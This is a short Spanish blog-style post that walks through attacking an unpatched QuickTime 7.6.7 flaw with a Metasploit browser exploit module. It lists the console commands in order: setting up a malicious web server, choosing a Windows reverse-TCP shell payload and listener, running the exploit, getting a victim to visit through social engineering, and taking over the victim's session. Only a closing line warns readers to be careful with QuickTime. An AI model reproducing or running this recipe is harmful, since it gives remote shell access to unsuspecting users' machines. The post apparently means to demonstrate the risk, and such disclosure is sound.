La noticia ha cogido tanta expectación, que los desarrolladores de metasploit han tardado apenas un día en liberar un módulo para su framework.
En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).
Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:
· use exploit/windows/browser/apple_
· set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
· set SRVPORT 80 (Puerto local del servicio)
· set URIPATH juegos (Uri del servicio)
· set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
· set LHOST 192.168.0.162 (IP donde se conectará la víctima)
· set LPORT 5050 (Puerto local de escucha)
· exploit (Ejecutamos el exploit)
Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.
Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.
Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.
Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:
· sessions -i 2
Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.